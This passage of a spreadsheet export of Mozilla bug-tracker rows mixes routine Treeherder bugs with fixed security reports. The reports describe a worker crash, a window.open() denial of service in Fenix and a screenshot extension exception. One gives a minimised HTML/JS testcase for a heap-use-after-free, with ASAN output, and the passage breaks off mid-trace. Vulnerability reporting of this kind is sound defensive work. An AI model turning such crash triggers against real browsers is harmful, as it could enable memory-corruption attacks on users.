          <t>[adv-main36+]</t>
        </is>
      </c>
      <c r="Q3409" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3409" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3409" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T3409" t="n">
        <v>1</v>
      </c>
      <c r="U3409" t="n">
        <v>0</v>
      </c>
      <c r="V3409" t="n">
        <v>23</v>
      </c>
      <c r="W3409" t="inlineStr">
        <is>
          <t>The 1 and 2 argument forms of the File constructor match the "chrome only" (not tagged [ChromeOnly]) constructor which accepts an nsIFile as the first argument. Using these on a worker attempts to unwrap an nsIFile off main thread and crashes:
#0  nsXPCWrappedJS::GetNewOrUsed (jsObj=..., aIID=..., wrapperResult=0x7fffbd4f8590) at /home/nikhil/mozilla-central-fetch/js/xpconnect/src/XPCWrappedJS.cpp:330
#1  0x00007fffef6c84c7 in mozilla::dom::UnwrapArgImpl (src=..., iid=..., ppArg=0x7fffbd4f9568) at /home/nikhil/mozilla-central-fetch/dom/bindings/BindingUtils.cpp:2740
#2  0x00007fffeee222b7 in mozilla::dom::UnwrapArg&lt;nsIFile&gt; (src=..., ppArg=0x7fffbd4f9568) at ../../dist/include/mozilla/dom/BindingUtils.h:64
#3  0x00007fffeee01dd3 in mozilla::dom::FileBinding::_constructor (cx=0x7fffc71395d0, argc=2, vp=0x7fffbfc651b8) at ./FileBinding.cpp:748
#4  0x00007ffff2a32d94 in js::CallJSNative (cx=0x7fffc71395d0, native=0x7fffeee009b0 &lt;mozilla::dom::FileBinding::_constructor(JSContext*, unsigned int, JS::Value*)&gt;, args=...)
    at /home/nikhil/mozilla-central-fetch/js/src/jscntxtinlines.h:226
#5  0x00007ffff2a33021 in js::CallJSNativeConstructor (cx=0x7fffc71395d0, native=0x7fffeee009b0 &lt;mozilla::dom::FileBinding::_constructor(JSContext*, unsigned int, JS::Value*)&gt;, args=...)
    at /home/nikhil/mozilla-central-fetch/js/src/jscntxtinlines.h:259
#6  0x00007ffff2a061c7 in js::InvokeConstructor (cx=0x7fffc71395d0, args=...) at /home/nikhil/mozilla-central-fetch/js/src/vm/Interpreter.cpp:595
#7  0x00007ffff29fa9c6 in Interpret (cx=0x7fffc71395d0, state=...) at /home/nikhil/mozilla-central-fetch/js/src/vm/Interpreter.cpp:2558
#8  0x00007ffff29ee10a in js::RunScript (cx=0x7fffc71395d0, state=...) at /home/nikhil/mozilla-central-fetch/js/src/vm/Interpreter.cpp:448
We could introduce non-ctor, static "File.fromnsIFile()" and change all call sites, unless there is a way to [ChromeOnly] a constructor or codegen some checks on the worker. Boris, any suggestions?</t>
        </is>
      </c>
      <c r="X3409" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3410">
      <c r="A3410" t="n">
        <v>1701673</v>
      </c>
      <c r="B3410" t="inlineStr">
        <is>
          <t>2021-03-29 07:32:07 -0700</t>
        </is>
      </c>
      <c r="C3410" t="inlineStr">
        <is>
          <t>Denial of Service via window.open() calls</t>
        </is>
      </c>
      <c r="D3410" t="inlineStr">
        <is>
          <t>2022-11-03 23:25:58 -0700</t>
        </is>
      </c>
      <c r="E3410" t="n">
        <v>1</v>
      </c>
      <c r="F3410" t="n">
        <v>1</v>
      </c>
      <c r="G3410" t="n">
        <v>2</v>
      </c>
      <c r="H3410" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3410" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J3410" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3410" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3410" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3410" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N3410" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3410" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3410" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main89+]</t>
        </is>
      </c>
      <c r="Q3410" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3410" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3410" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3410" t="n">
        <v>1</v>
      </c>
      <c r="U3410" t="n">
        <v>0</v>
      </c>
      <c r="V3410" t="n">
        <v>14</v>
      </c>
      <c r="W3410" t="inlineStr">
        <is>
          <t>Created attachment 9212203
Proof of concept page
Fenix protects against websites opening too many `alert()` or `prompt()` dialogs, similarly to Firefox on desktop. It doesn’t have any such protection for abuse of `window.open()` calls however. Each call results in a pop-up prompt, with an unlimited number of such calls stacking.
Please take care when opening the attached proof of concept page, the resulting denial of service is difficult to resolve! This page will attempt to open a pop-up every 100 milliseconds, each time resulting in a new prompt. These prompts are too many to be canceled, and the entire Fenix UI becomes unreachable so that switching tabs or reloading isn’t an option. Even if the process is terminated, restarting will restore the tab and load the malicious page again. I could only resolve this via Developer Tools.
Firefox on desktop doesn’t have this issue: its prompts are tab-modal, they don’t block other UI parts. Also, the pop-up prompt is non-modal. And the prompts don’t stack, the existing prompt simply counts up. So all pop-up requests can be dismissed at once.</t>
        </is>
      </c>
      <c r="X3410" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3411">
      <c r="A3411" t="n">
        <v>1505882</v>
      </c>
      <c r="B3411" t="inlineStr">
        <is>
          <t>2018-11-08 11:37:05 -0800</t>
        </is>
      </c>
      <c r="C3411" t="inlineStr">
        <is>
          <t>Can't play videos on Amazon Prime Video ("video unavailable")</t>
        </is>
      </c>
      <c r="D3411" t="inlineStr">
        <is>
          <t>2020-04-29 08:02:09 -0700</t>
        </is>
      </c>
      <c r="E3411" t="n">
        <v>1</v>
      </c>
      <c r="F3411" t="n">
        <v>1</v>
      </c>
      <c r="G3411" t="n">
        <v>3</v>
      </c>
      <c r="H3411" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3411" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3411" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K3411" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3411" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3411" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3411" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3411" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3411" t="inlineStr"/>
      <c r="Q3411" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3411" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3411" t="inlineStr">
        <is>
          <t>mozilla65</t>
        </is>
      </c>
      <c r="T3411" t="n">
        <v>1</v>
      </c>
      <c r="U3411" t="n">
        <v>0</v>
      </c>
      <c r="V3411" t="n">
        <v>27</v>
      </c>
      <c r="W3411" t="inlineStr">
        <is>
          <t>Using the latest Nightly on macOS (65.0a1 (2018-11-08) (64 bit)) I get a "video unavailable" message on any video I try to play.
The same video works on Beta, and was working 24 hours ago on Nightly (2018-11-07 build, according to history updates).</t>
        </is>
      </c>
      <c r="X3411" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3412">
      <c r="A3412" t="n">
        <v>1179337</v>
      </c>
      <c r="B3412" t="inlineStr">
        <is>
          <t>2015-07-01 10:36:40 -0700</t>
        </is>
      </c>
      <c r="C3412" t="inlineStr">
        <is>
          <t>Logviewer console errors on first-click of a failure-step button edge</t>
        </is>
      </c>
      <c r="D3412" t="inlineStr">
        <is>
          <t>2021-12-05 14:50:45 -0800</t>
        </is>
      </c>
      <c r="E3412" t="n">
        <v>1</v>
      </c>
      <c r="F3412" t="n">
        <v>1</v>
      </c>
      <c r="G3412" t="n">
        <v>7</v>
      </c>
      <c r="H3412" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3412" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3412" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3412" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3412" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3412" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3412" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3412" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3412" t="inlineStr"/>
      <c r="Q3412" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3412" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3412" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3412" t="n">
        <v>1</v>
      </c>
      <c r="U3412" t="n">
        <v>0</v>
      </c>
      <c r="V3412" t="n">
        <v>7</v>
      </c>
      <c r="W3412" t="inlineStr">
        <is>
          <t>The Logviewer console errors when first clicking on a failure-step button edge.
To reproduce:
o open any failed job in Logviewer eg.
https://treeherder.mozilla.org/logviewer.html#?job_id=11257981&amp;repo=mozilla-inbound
o open the console
o click on the pale orange perimeter of the failure step
Expected:
A clean load of the failure step.
Observed:
(console) Uncaught TypeError: Cannot read property 'top' of undefined
Which exists here:
https://github.com/mozilla/treeherder/blob/master/ui/js/directives/log_viewer_steps.js#L12
It errors the same on any step type (failure, or success). Subsequent clicks seem to be fine.
It doesn't appear to be related to the recent work in bug 1057341 for the new logviewer step color treatment and header work (I rolled back to one commit prior and still reproduced it).</t>
        </is>
      </c>
      <c r="X3412" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3413">
      <c r="A3413" t="n">
        <v>1665820</v>
      </c>
      <c r="B3413" t="inlineStr">
        <is>
          <t>2020-09-17 19:15:56 -0700</t>
        </is>
      </c>
      <c r="C3413" t="inlineStr">
        <is>
          <t>Screenshot exception with mutation observers</t>
        </is>
      </c>
      <c r="D3413" t="inlineStr">
        <is>
          <t>2024-05-30 10:18:47 -0700</t>
        </is>
      </c>
      <c r="E3413" t="n">
        <v>1</v>
      </c>
      <c r="F3413" t="n">
        <v>1</v>
      </c>
      <c r="G3413" t="n">
        <v>2</v>
      </c>
      <c r="H3413" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3413" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3413" t="inlineStr">
        <is>
          <t>Screenshots</t>
        </is>
      </c>
      <c r="K3413" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3413" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3413" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3413" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3413" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3413" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main83+]</t>
        </is>
      </c>
      <c r="Q3413" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3413" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3413" t="inlineStr">
        <is>
          <t>83 Branch</t>
        </is>
      </c>
      <c r="T3413" t="n">
        <v>1</v>
      </c>
      <c r="U3413" t="n">
        <v>0</v>
      </c>
      <c r="V3413" t="n">
        <v>38</v>
      </c>
      <c r="W3413" t="inlineStr">
        <is>
          <t>Created attachment 9176455
hijackScreenshotInitialization-testcase-new.html
Filing this for kaisersoze, WIP for a screenshot bug. Currently if you take a screenshot of the testcase page using one of the two buttons in the top right (whole page or visible window) it will throw an exception in the extension itself. Seems to be trying to grab the screenshot iframe and getting there too early, but could be close to something like a priv-esc into the extension context if he gets the timing right.</t>
        </is>
      </c>
      <c r="X3413" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3414">
      <c r="A3414" t="n">
        <v>1591076</v>
      </c>
      <c r="B3414" t="inlineStr">
        <is>
          <t>2019-10-24 06:52:22 -0700</t>
        </is>
      </c>
      <c r="C3414" t="inlineStr">
        <is>
          <t>Popups show wrong value</t>
        </is>
      </c>
      <c r="D3414" t="inlineStr">
        <is>
          <t>2019-11-19 12:26:34 -0800</t>
        </is>
      </c>
      <c r="E3414" t="n">
        <v>1</v>
      </c>
      <c r="F3414" t="n">
        <v>1</v>
      </c>
      <c r="G3414" t="n">
        <v>7</v>
      </c>
      <c r="H3414" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3414" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3414" t="inlineStr">
        <is>
          <t>Perfherder</t>
        </is>
      </c>
      <c r="K3414" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3414" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3414" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3414" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3414" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3414" t="inlineStr"/>
      <c r="Q3414" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3414" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3414" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3414" t="n">
        <v>1</v>
      </c>
      <c r="U3414" t="n">
        <v>0</v>
      </c>
      <c r="V3414" t="n">
        <v>4</v>
      </c>
      <c r="W3414" t="inlineStr">
        <is>
          <t>This issue can be observed on retriggered data points.
**STR**
1. Go to a plot which has some retriggered data points and zoom onto them ([example](https://treeherder.mozilla.org/perf.html#/graphs?highlightAlerts=1&amp;series=autoland,2056505,1,1&amp;timerange=1209600&amp;zoom=1571758388693,1571765213682,50.45892353730169,77.42833623390132)).
2. Choose a commit with retriggered data points (e8905725eb46e, for example).
3. Hover over each of the retriggered data points.
Expected results:
From top to bottom on the chosen commit, the popup should show the **68.22**, **62.00**, **59.41** and **58.48** values.
What we actually get:
Popup always shows the **62.00** value, which corresponds to the first data point, no matter what data point you hover onto.</t>
        </is>
      </c>
      <c r="X3414" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3415">
      <c r="A3415" t="n">
        <v>1306159</v>
      </c>
      <c r="B3415" t="inlineStr">
        <is>
          <t>2016-09-28 17:24:52 -0700</t>
        </is>
      </c>
      <c r="C3415" t="inlineStr">
        <is>
          <t>Inconsistent values for PULSE_DATA_INGESTION_SOURCES between environments</t>
        </is>
      </c>
      <c r="D3415" t="inlineStr">
        <is>
          <t>2016-09-30 06:15:58 -0700</t>
        </is>
      </c>
      <c r="E3415" t="n">
        <v>1</v>
      </c>
      <c r="F3415" t="n">
        <v>1</v>
      </c>
      <c r="G3415" t="n">
        <v>7</v>
      </c>
      <c r="H3415" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3415" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3415" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K3415" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3415" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3415" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3415" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3415" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3415" t="inlineStr"/>
      <c r="Q3415" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3415" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3415" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3415" t="n">
        <v>1</v>
      </c>
      <c r="U3415" t="n">
        <v>0</v>
      </c>
      <c r="V3415" t="n">
        <v>6</v>
      </c>
      <c r="W3415" t="inlineStr">
        <is>
          <t>There are a few inconsistencies in the value of PULSE_DATA_INGESTION_SOURCES:
* On SCL3+Heroku stage, there's a `treeherder-test` exchange - but not on prod. Is this used?
* The value for Heroku stage matches that of SCL3 prod (and not SCL3 stage). I'm presuming it should instead match SCL3 stage?
SCL3 stage:
[
  {
    "exchange": "exchange/taskcluster-treeherder-staging/v1/jobs",
    "destinations": ["tc-treeherder-stage"],"projects": ["#"]
  },
  {
    "exchange": "exchange/treeherder-test/jobs",
    "destinations": ["treeherder-staging"],"projects": ["#"]
  }
]
Heroku stage:
[
  {
    "exchange": "exchange/taskcluster-treeherder/v1/jobs",
    "destinations": ["tc-treeherder"], "projects": ["#"]
  },
  {
    "exchange": "exchange/treeherder-test/jobs",
    "destinations": ["treeherder-staging"], "projects": ["#"]
  }
]
SCL3 prod:
[
  {
    "exchange": "exchange/taskcluster-treeherder/v1/jobs",
    "destinations": ["tc-treeherder"],"projects": ["#"]
  }
]
Heroku prod:
[
  {
    "exchange": "exchange/taskcluster-treeherder/v1/jobs",
    "destinations": ["tc-treeherder"],"projects": ["#"]
  }
]</t>
        </is>
      </c>
      <c r="X3415" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3416">
      <c r="A3416" t="n">
        <v>1423159</v>
      </c>
      <c r="B3416" t="inlineStr">
        <is>
          <t>2017-12-05 02:26:07 -0800</t>
        </is>
      </c>
      <c r="C3416" t="inlineStr">
        <is>
          <t>heap-use-after-free in mozilla::CreateMouseOrPointerWidgetEvent</t>
        </is>
      </c>
      <c r="D3416" t="inlineStr">
        <is>
          <t>2024-05-30 09:39:25 -0700</t>
        </is>
      </c>
      <c r="E3416" t="n">
        <v>1</v>
      </c>
      <c r="F3416" t="n">
        <v>1</v>
      </c>
      <c r="G3416" t="n">
        <v>3</v>
      </c>
      <c r="H3416" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3416" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3416" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K3416" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L3416" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3416" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3416" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3416" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3416" t="inlineStr">
        <is>
          <t>[adv-main58+][adv-esr52.6+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3416" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3416" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3416" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T3416" t="n">
        <v>1</v>
      </c>
      <c r="U3416" t="n">
        <v>0</v>
      </c>
      <c r="V3416" t="n">
        <v>26</v>
      </c>
      <c r="W3416" t="inlineStr">
        <is>
          <t>Created attachment 8934472
crash.html (minimised testcase)
The following testcase crashes a release build of Firefox 57.0.2 (SourceStamp=15bb6c3fb5875c7f39aef036dd161df1407b5ee3). It requires the fuzzPriv extension and popups enabled for the page. The cursor needs to be somewhere over the page on loading the testcase.
crash.html:
&lt;script&gt;	
function spin () {
    var x=new XMLHttpRequest();
    x.open("POST","https://mozilla.org",false);
    try{x.send("X");}catch(e){}
}
function start() {
    setTimeout(fun0, 500);
}
function fun0() {
	o67=document.documentElement.onmouseout=fun1;
	o123=window.open('div.html','p','');
}
function fun1() {
	o123.close();
	spin();
    fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==21839==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d000278b30 at pc 0x7fdee55652eb bp 0x7ffdf7fefb30 sp 0x7ffdf7fefb28
READ of size 8 at 0x60d000278b30 thread T0
    #0 0x7fdee55652ea in nsCOMPtr_base::assign_with_AddRef(nsISupports*) /builds/worker/workspace/build/src/xpcom/base/nsCOMPtr.cpp:42:5
    #1 0x7fdee9fc856f in operator= /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:967:5
    #2 0x7fdee9fc856f in mozilla::CreateMouseOrPointerWidgetEvent(mozilla::WidgetMouseEvent*, mozilla::EventMessage, nsIContent*, nsAutoPtr&lt;mozilla::WidgetMouseEvent&gt;&amp;) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:3964
    #3 0x7fdee9fc74ed in mozilla::EventStateManager::DispatchMouseOrPointerEvent(mozilla::WidgetMouseEvent*, mozilla::EventMessage, nsIContent*, nsIContent*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:4008:3
    #4 0x7fdee9fc9377 in mozilla::EventStateManager::NotifyMouseOut(mozilla::WidgetMouseEvent*, nsIContent*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:4168:3
    #5 0x7fdee9fca62f in mozilla::EventStateManager::NotifyMouseOver(mozilla::WidgetMouseEvent*, nsIContent*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:4222:3
    #6 0x7fdee9fca54c in mozilla::EventStateManager::NotifyMouseOver(mozilla::WidgetMouseEvent*, nsIContent*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:4203:20
    #7 0x7fdee9faa584 in mozilla::EventStateManager::GenerateMouseEnterExit(mozilla::WidgetMouseEvent*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:4342:9
    #8 0x7fdee9fa511f in mozilla::EventStateManager::PreHandleEvent(nsPresContext*, mozilla::WidgetEvent*, nsIFrame*, nsIContent*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:732:5
    #9 0x7fdeec1aa788 in mozilla::PresShell::HandleEventInternal(mozilla::WidgetEvent*, nsEventStatus*, bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:8156:19
    #10 0x7fdeec1ac477 in mozilla::PresShell::HandlePositionedEvent(nsIFrame*, mozilla::WidgetGUIEvent*, nsEventStatus*) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:7954:10
    #11 0x7fdeec1a77cd in mozilla::PresShell::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*, nsIContent**) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:7751:12
    #12 0x7fdeeb9a3313 in nsViewManager::DispatchEvent(mozilla::WidgetGUIEvent*, nsView*, nsEventStatus*) /builds/worker/workspace/build/src/view/nsViewManager.cpp:812:14
    #13 0x7fdeec1806e6 in mozilla::PresShell::DispatchSynthMouseMove(mozilla::WidgetGUIEvent*, bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:3735:33
    #14 0x7fdeec194808 in mozilla::PresShell::ProcessSynthMouseMoveEvent(bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:5702:12
    #15 0x7fdeec1d79a7 in mozilla::PresShell::nsSynthMouseMoveEvent::WillRefresh(mozilla::TimeStamp) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/PresShell.h:649:16
    #16 0x7fdeec0fbf3b in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1886:12
    #17 0x7fdeec109f3e in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:337:13
    #18 0x7fdeec109f3e in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:307
    #19 0x7fdeec109a56 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:329:5
    #20 0x7fdeec10c4cb in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:770:5
    #21 0x7fdeec10c4cb in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:683
    #22 0x7fdeec107827 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::ParentProcessVsyncNotifier::Run() /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:529:20
    #23 0x7fdee56dc935 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1039:14
    #24 0x7fdee56e209c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:521:10
    #25 0x7fdee645f131 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #26 0x7fdee63c387b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #27 0x7fdee63c387b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #28 0x7fdee63c387b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #29 0x7fdeeba25daf in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #30 0x7fdeef1125f1 in nsAppStartup::Run() /builds/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:288:30
    #31 0x7fdeef2f186b in XREMain::XRE_mainRun() /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4703:22
    #32 0x7fdeef2f3463 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4867:8
    #33 0x7fdeef2f488b in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4962:21
    #34 0x4ebea3 in do_main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:236:22
    #35 0x4ebea3 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:309
    #36 0x7fdf0191f2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
    #37 0x41d9f8 in _start (/home/nils/fuzzer3/rel/firefox/firefox+0x41d9f8)
0x60d000278b30 is located 0 bytes inside of 136-byte region [0x60d000278b30,0x60d000278bb8)
freed by thread T0 here:
    #0 0x4bbf2b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7fdee557b367 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2704:25
    #2 0x7fdee55826bb in FreeSnowWhite /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2892:3
    #3 0x7fdee55826bb in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3909
    #4 0x7fdee5581c03 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3730:9
    #5 0x7fdee5585950 in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4299:21
    #6 0x7fdee826ab6d in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1480:3
    #7 0x7fdee7dbaa4b in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1434:3
    #8 0x7fdee5703f91 in NS_InvokeByIndex /builds/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:129
    #9 0x7fdee6e0c610 in Invoke /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1996:12
    #10 0x7fdee6e0c610 in Call /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1315
    #11 0x7fdee6e0c610 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1282
    #12 0x7fdee6e139aa in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:929:12
    #13 0x7fdeef7d7d64 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
